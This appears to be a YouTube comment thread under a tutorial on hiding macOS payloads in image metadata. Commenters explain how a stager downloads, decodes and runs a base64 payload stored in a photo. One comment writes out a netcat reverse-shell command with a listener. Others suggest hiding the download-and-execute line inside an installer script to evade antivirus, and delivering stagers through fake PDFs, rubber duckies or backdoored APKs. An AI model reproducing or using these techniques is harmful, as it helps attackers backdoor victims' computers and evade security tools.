Hide Payloads for MacOS Inside Photo Metadata [Tutorial] 

HAHAHAHAHAHA most likely hardware malfunction

@David that's why it looked suspicious to me

@David no I

Certain kinds of medication will have this as a side effect.

HAHHAHAHAHAAHAH

Hey Jose! Could you do it?

Clicking the image will not make the payload run. You will need a stager (act as a key) to run the payload. So you either have direct access to the victim machine.

@@xugestory thank you for the reply :)

​@@xugestory That's what I thought as well but there is another Null Byte article which suggests otherwise. How would this work then or is this incorrect? exiftool -Comment="" pic.jpg This suggests the file can be run via a web browser but this seems wrong to me.

still i'm waiting for a perfect answer to your question ;)

me too

Steghide

well, we are stilling

am searching this for a year man

It's true - the key takeaway from this video is the method of downloading a base64 string from an image stored on a 'trusted' server that probably won't look suspicious. He didn't demonstrate any method for actually using the technique - other than the ridicolous idea that someone would log in as root then execute the command that he wrote up. An extra couple of minutes explaining some real world uses for this would have been worthwhile.

@@OliNorwell I think he's trying to demonstrate how if there are computers already infected with the botnet, they'll be polling for these kinds of images and executing it. It's a way to control the botnet without directly revealing yourself (connections to Twitter don't look suspicious).

@@leonardusl5141 yeah that's what it is like... It's a tutorial for the NSA 😂😂 I don't own a botnet

saruabh isn't the payload will run when the person clicks on the image ro i am getting it completly wrong

@@buddinglearner7085 no. When you click on the image, the i age viewer application is run. It takes the path to the image and does what it has to do to display it. (I might be wrong here but at least this somehow makes sense to me now😂)

And completely illegal lmao. Why would he film himself doing something illegal and upload it on RU-vid? That's like going into a police station and shouting "I'M A HACKER HAHA I'VE DONE BAD THINGS ARREST ME"

If you look at the code he show you about the variable "p". And if you read the code at the end it will run after it get the certificate and decode the base64 payload.

@@xugestory how to make the target make variable p

@@theinfosecguy watch the video from the start to the end and listen carefully. Its already there

​@@xugestory​What he meant is why would the target run the last step after downloading the image. He is looking for a way in which the command should run automatically if the target opens the downloaded image or so.

@@Teja- target will not be stupid enough to run a code if he don't know what he is doing. So generally you will need physical access to the computer/machine. You can upload the payloaded image to the internet and then make a fake pdf,apk, or any other way that you can inject the "Stager" aka "var p" mentioned in the video. So when they download the pdf file for example the stager will run and it will download,decode and run the payload . Or You can create a rubber ducky, that will run the "Stager". Or If you have a chances to access the target machine, just run the stager yourself. I wont take long enough for the owner to know. Think creatively ! Combine different techniques learned. Hope this will answer the question asked by jibin george

just watch every videos on his channel

Fastrol thx but I want basics to each and every things in hacking

@Suman Mandal I thank you so much

Internet is the answer ! Google, forum, twitter, facebook, and hacker community.

You technically answered the question yourself after you hacked your 5 boxes part. You don't get good at it. You learn it. Study the vulnerabilities and find out how to exploit it.

That's what makes hacking fun! Imagine how boring a crossword puzzle would become if you were given the same one every time. Hacking really is just a puzzle. Always trying to figure out how to take advantage of something. Once I've created my own malware, I always want to move on to the next thing and see what else I could do or another route I could take. Only so many times you can keep redoing the same old things you've figured out.

it's a post exploitation method I think right?🤔

It will not execute the payload when the victim clicks on the image. This is just a way of downloading and executing malicious code. That way, you could write a bash script, send it to someone, and the malicious code that could trigger anti viruses wouldn't be in the script, it would get downloaded and executed in a more stealthy way.

@@DaRealNim Ooh don't you think that the attacker must had setup a listner too? Here in this procedure we created the payload..turned the code into base64 format..and embedded it into an image..but while creating the payload we hasn't setup any listner

@@divakarbisht7951 Yes, in this case, there is no listener, because the payload is just "create a file named MyFatBird in this directory". But instead of that, you could make a payload that connects to a listener and give you full access. Example: You encode this in base64 for your payload: "nc -e /bin/bash [LISTENER'S IP] [LISTENER'S PORT]" And on the attacker's machine, you do "nc -lvp [LISTENER'S PORT]" Now if you put your base64 payload in an image, then upload it on the internet, then it's done, you have a great way of backdooring a Linux system. For example, you can write a bash script that download and installs some random legit software, and in the middle of your script, you put the line that download and executes the payload. If someone looks quickly at your code, or if an antivirus analyses it, it'll just look like you're downloading an image on the internet. And that's what you're doing. But in the image is your virus, and that's when it will get executed. So it's a stealthy way of backdooring a computer.

Ooh..🤔 i see...that's great...Thankyou😇

Not answering R u know or u r just newbie

@Geetha Satheesh geethu......nvr give up.....there is no fulstop...

Why not use an APK? Just make it sound convincing and backdoor it. It's fairly easy to backdoor a apk.

@@demonman1234 que programa recomiendas para hacer estas APK

I backdoor the apk with an image but it's not open in android 😔

Does it give you any errors?

@@NullByteWHT nothing bro

Maybe not completely random or visual quality will suffer obvious visual and statistical anomalies. You basically have to analyze and follow a similar histogram to the cover image.

@Suman Mandal He's a prolific neonazi troll.

Yes you can upload the payload for RAT or any other payload. But you have to know that the payload will not run just by double clicking the image ( like what we will do to view it). We need something which call stager ( to make it simple, payload embedded in image is like car, and to start a car you need a "key") so stager could be refer to a key to run the car(payload).

@@xugestory thank you for the clarification, but do you know any youtubr video where i can see this?

@@thebrowserpiratesteam3414 pay attention to the code he show us about p=$(curl........) ......and so on.. This code probably will download the image from the source ( the image with payload that you uploaded) and then grep the value of the certificate (which is the payload in base64 form) then it will decode the payload in base64 then run the payload. So you can use a rubber ducky if you have direct access to the computer.( Learn how to use rubber Ducky or mousehijacking). Tutorial are easy to find

@@xugestory ok thank you for the i formation .very helpful

@@thebrowserpiratesteam3414 youre welcome